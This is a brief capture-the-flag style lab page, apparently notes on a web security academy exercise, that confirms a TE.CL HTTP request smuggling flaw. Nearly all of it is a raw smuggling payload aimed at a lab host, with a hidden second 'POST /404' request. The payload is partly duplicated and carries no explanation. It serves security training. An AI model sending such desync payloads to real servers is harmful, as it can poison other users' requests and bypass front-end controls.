Lab: HTTP request smuggling, confirming a TE.CL vulnerability via differential responses
PreviousLab: HTTP2 request splitting via CRLF injectionNextLab: Bypassing access controls via HTTP2 request tunnelling
Last updated
Last updated
POST /404 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15
x=1
0
POST / HTTP/1.1
Host: 0a4900360342c7cd81f76382005b0073.web-security-academy.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Content-Length: 4
5e
POST /404 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15
x=1
0